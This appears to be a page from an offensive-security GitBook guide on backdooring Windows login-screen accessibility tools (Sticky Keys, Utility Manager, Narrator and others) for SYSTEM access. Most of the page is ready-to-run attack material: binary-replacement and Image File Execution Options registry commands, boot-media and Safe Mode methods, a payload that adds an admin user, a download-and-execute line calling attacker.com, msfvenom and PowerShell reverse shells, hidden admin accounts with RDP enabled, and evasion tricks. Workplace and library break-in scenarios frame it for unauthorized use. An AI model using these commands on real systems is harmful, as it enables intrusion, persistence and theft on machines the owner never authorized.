This guide is currently under development, and I greatly welcome any suggestions or feedback or at reaper.gitbook@gmail.com

Misusing accessibility features

Understanding the Attack Vector

Why Accessibility Features Are Exploitable

Windows accessibility features create a unique attack surface because they:

  • Run with SYSTEM privileges by design

  • Execute before user authentication (available at login screen)

  • Are trusted system executables that bypass normal restrictions

  • Can be triggered through simple keyboard shortcuts

The Core Exploit: Replace legitimate accessibility executables with command prompts or custom payloads, giving SYSTEM-level access from the login screen without authentication.

Target Accessibility Features

Primary Targets

Sticky Keys (sethc.exe)

  • Trigger: Press Shift 5 times rapidly

  • Location: C:\Windows\System32\sethc.exe

  • Access Level: SYSTEM

  • Best For: Most reliable, works on all Windows versions

Utility Manager (utilman.exe)

  • Trigger: Windows Key + U

  • Location: C:\Windows\System32\utilman.exe

  • Access Level: SYSTEM

  • Best For: Quick access, harder to accidentally trigger

On-Screen Keyboard (osk.exe)

  • Trigger: Via Utility Manager or accessibility settings

  • Location: C:\Windows\System32\osk.exe

  • Access Level: SYSTEM

  • Best For: Less suspicious than cmd.exe replacement

Magnifier (magnify.exe)

  • Trigger: Windows Key + Plus

  • Location: C:\Windows\System32\magnify.exe

  • Access Level: SYSTEM

  • Best For: Alternative when others are monitored

Basic Exploitation Methods

Method 1: Direct File Replacement

The simplest and most effective approach - replace the accessibility executable with cmd.exe.

Sticky Keys Replacement:

# Take ownership and permissions
takeown /f C:\Windows\System32\sethc.exe /a
icacls C:\Windows\System32\sethc.exe /grant administrators:F

# Backup original
copy C:\Windows\System32\sethc.exe C:\Windows\System32\sethc.exe.bak

# Replace with command prompt
copy C:\Windows\System32\cmd.exe C:\Windows\System32\sethc.exe

Utility Manager Replacement:

takeown /f C:\Windows\System32\utilman.exe /a
icacls C:\Windows\System32\utilman.exe /grant administrators:F
copy C:\Windows\System32\utilman.exe C:\Windows\System32\utilman.exe.bak
copy C:\Windows\System32\cmd.exe C:\Windows\System32\utilman.exe

Triggering the Backdoor:

  • Reboot or lock the computer

  • At login screen, press Shift 5 times (for sethc) or Windows+U (for utilman)

  • Command prompt opens with SYSTEM privileges

Method 2: Registry Image File Execution Options

Uses Windows debugging infrastructure to redirect execution without modifying files.

Setup Registry Redirection:

# Redirect sethc.exe to cmd.exe via registry
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v Debugger /t REG_SZ /d "C:\windows\system32\cmd.exe" /f

# Redirect utilman.exe
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe" /v Debugger /t REG_SZ /d "C:\windows\system32\cmd.exe" /f

Advantages of Registry Method:

  • Original files remain intact

  • Harder to detect casually

  • Survives system file integrity checks

  • Can be applied to multiple targets simultaneously

Method 3: Custom Payload Deployment

Replace accessibility features with custom executables for specific functionality.

Simple User Creation Payload:

// user_creator.c
#include <windows.h>
int main() {
    system("net user hacker Password123! /add");
    system("net localgroup administrators hacker /add");
    return 0;
}

Compile and Deploy:

gcc -o user_creator.exe user_creator.c
takeown /f C:\Windows\System32\sethc.exe /a
icacls C:\Windows\System32\sethc.exe /grant administrators:F
copy user_creator.exe C:\Windows\System32\sethc.exe

Reverse Shell Payload:

// reverse_shell.c
#include <windows.h>
int main() {
    system("powershell -c \"IEX(New-Object Net.WebClient).downloadString('http://attacker.com/shell.ps1')\"");
    return 0;
}

Physical Access Exploitation

Bootable Media Method

When you have physical access but no credentials:

Windows PE Approach:

# Boot from Windows PE USB/CD
# Target drive typically appears as D: in PE environment

# Replace accessibility features
copy D:\Windows\System32\sethc.exe D:\Windows\System32\sethc.exe.bak
copy D:\Windows\System32\cmd.exe D:\Windows\System32\sethc.exe

# Reboot to normal Windows - backdoor is active

Linux Live USB Method:

# Boot from Linux live USB
mkdir /mnt/windows
mount /dev/sda1 /mnt/windows

# Perform replacement
cp /mnt/windows/Windows/System32/sethc.exe /mnt/windows/Windows/System32/sethc.exe.bak
cp /mnt/windows/Windows/System32/cmd.exe /mnt/windows/Windows/System32/sethc.exe

umount /mnt/windows
# Reboot to Windows

Safe Mode Exploitation

In Safe Mode with Command Prompt, you often get elevated access by default:

# Boot to Safe Mode with Command Prompt
# Perform replacements from elevated context
takeown /f C:\Windows\System32\sethc.exe
copy C:\Windows\System32\cmd.exe C:\Windows\System32\sethc.exe

# Changes persist when booting to normal mode

Advanced Exploitation Techniques

Multiple Target Deployment

Hit several accessibility features simultaneously for redundancy:

# Replace multiple targets
for %i in (sethc.exe utilman.exe osk.exe magnify.exe) do (
    takeown /f "C:\Windows\System32\%i" /a
    icacls "C:\Windows\System32\%i" /grant administrators:F
    copy "C:\Windows\System32\%i" "C:\Windows\System32\%i.bak"
    copy "C:\Windows\System32\cmd.exe" "C:\Windows\System32\%i"
)

Stealth Wrapper Approach

Maintain original functionality while adding backdoor capability:

@echo off
REM stealth_sethc.bat
if "%1"=="backdoor" (
    start cmd.exe
) else (
    start C:\Windows\System32\sethc.exe.original
)

Deploy the wrapper:

copy C:\Windows\System32\sethc.exe C:\Windows\System32\sethc.exe.original
copy stealth_sethc.bat C:\Windows\System32\sethc.exe

Usage:

  • Normal Shift x5 = original sticky keys

  • Shift x5 with "backdoor" parameter = command prompt

Registry-Based Conditional Access

Create conditional execution based on specific triggers:

# Create conditional batch file
echo @echo off > C:\Windows\System32\conditional.bat
echo if "%%COMPUTERNAME%%"=="TARGET-PC" start cmd.exe >> C:\Windows\System32\conditional.bat
echo if "%%USERNAME%%"=="admin" start cmd.exe >> C:\Windows\System32\conditional.bat

# Set registry redirection
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v Debugger /t REG_SZ /d "C:\Windows\System32\conditional.bat" /f

Specific Attack Scenarios

Kiosk Environment Breakout

Public Computer Exploitation:

  1. Try accessibility shortcuts at login screen

  2. If Utility Manager opens, look for Settings or Help buttons

  3. Help systems often open browsers with file:// access

  4. Use "Run as administrator" options when available

Common Kiosk Breakout Paths:

  • Utility Manager → Settings → Browse for files

  • On-Screen Keyboard → Right-click → Properties → Browse

  • Narrator → Voice settings → Browse for voice files

  • Magnifier → Settings → Help → File browser

Corporate Workstation Access

Lunch Break Attack:

  1. Physical access to unlocked or logged-out workstation

  2. Boot from USB with Windows PE

  3. Replace accessibility feature

  4. Return later and use accessibility shortcut for SYSTEM access

Persistence Setup from SYSTEM Access:

# Create hidden admin account
net user "IT Support" "ComplexPass123!" /add
net localgroup administrators "IT Support" /add

# Hide account from login screen
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "IT Support" /t REG_DWORD /d 0 /f

# Enable RDP for remote access
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
netsh advfirewall firewall set rule group="remote desktop" new enable=Yes

Shared Computer Lab

University/Library Scenario:

  1. Accessibility features may work even on restricted accounts

  2. Use SYSTEM access to enumerate other users

  3. Check for stored credentials or interesting data

  4. Install persistence for later access

Quick Enumeration Commands:

# From accessibility SYSTEM prompt
whoami /all
net user
dir C:\Users
wmic logicaldisk get size,freespace,caption

Payload Delivery Methods

MSFVenom Integration

Generate Custom Payloads:

# Reverse shell payload
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f exe -o accessibility_shell.exe

# Bind shell payload  
msfvenom -p windows/meterpreter/bind_tcp LPORT=4444 -f exe -o accessibility_bind.exe

# User creation payload
msfvenom -p windows/exec CMD="net user hacker Password123! /add && net localgroup administrators hacker /add" -f exe -o user_add.exe

Deploy Payload:

takeown /f C:\Windows\System32\sethc.exe /a
icacls C:\Windows\System32\sethc.exe /grant administrators:F
copy accessibility_shell.exe C:\Windows\System32\sethc.exe

PowerShell Payload Integration

PowerShell Reverse Shell:

# reverse_shell.ps1
$client = New-Object System.Net.Sockets.TCPClient('192.168.1.100',4444)
$stream = $client.GetStream()
[byte[]]$bytes = 0..65535|%{0}
while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){
    $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i)
    $sendback = (iex $data 2>&1 | Out-String)
    $sendback2 = $sendback + 'PS ' + (pwd).Path + '> '
    $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2)
    $stream.Write($sendbyte,0,$sendbyte.Length)
    $stream.Flush()
}
$client.Close()

Wrapper for PowerShell Execution:

@echo off
powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -File C:\Windows\Temp\reverse_shell.ps1

Evasion Techniques

Timestamp Preservation

Maintain original file timestamps to avoid detection:

# Get original timestamps before replacement
forfiles /m sethc.exe /c "cmd /c echo @fdate @ftime" > original_time.txt

# Perform replacement
copy C:\Windows\System32\cmd.exe C:\Windows\System32\sethc.exe

# Restore original timestamps (requires additional tools)
# Use touch.exe or PowerShell to restore timestamps

Alternative Locations

Use less monitored accessibility features:

# Target narrator.exe (less commonly monitored)
takeown /f C:\Windows\System32\narrator.exe /a
copy C:\Windows\System32\narrator.exe C:\Windows\System32\narrator.exe.bak
copy C:\Windows\System32\cmd.exe C:\Windows\System32\narrator.exe

# Trigger with Windows+Ctrl+Enter

Registry Hiding

Use subtle registry modifications:

# Use registry key with slight misspelling or extra space
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe " /v Debugger /t REG_SZ /d "cmd.exe" /f

# Note the space after sethc.exe - harder to spot in tools

Cleanup and Restoration

Quick Restoration

Restore from Backups:

copy C:\Windows\System32\sethc.exe.bak C:\Windows\System32\sethc.exe
copy C:\Windows\System32\utilman.exe.bak C:\Windows\System32\utilman.exe

# Remove registry redirections
reg delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /f
reg delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe" /f

System File Checker Restoration

Use Windows SFC:

# Restore specific files
sfc /scanfile=C:\Windows\System32\sethc.exe
sfc /scanfile=C:\Windows\System32\utilman.exe

# Full system scan
sfc /scannow

Key Operational Notes

Requirements

  • Administrator privileges for file replacement method

  • Physical access for login screen exploitation

  • Target must have accessibility features enabled (default on most Windows)

Success Indicators

  • Accessibility shortcut opens command prompt instead of normal feature

  • Command prompt runs as SYSTEM (verify with whoami)

  • Multiple accessibility features compromised for redundancy

Common Failure Points

  • Insufficient permissions for file modification

  • Antivirus blocking system file changes

  • Windows File Protection restoring files

  • User Account Control preventing elevation

Best Targets

  • Sticky Keys (sethc.exe) - Most reliable, universal trigger

  • Utility Manager (utilman.exe) - Quick access, less accidental activation

  • Multiple features - Redundancy in case one is restored or blocked

This technique remains one of the most effective methods for gaining SYSTEM-level access from Windows login screens, particularly valuable in physical access scenarios and environments where other exploitation methods are restricted.

PreviousAbusing Windows Subsystem for Linux (WSL)NextGroup Policy Preferences (GPP) password retrieval

Last updated

Was this helpful?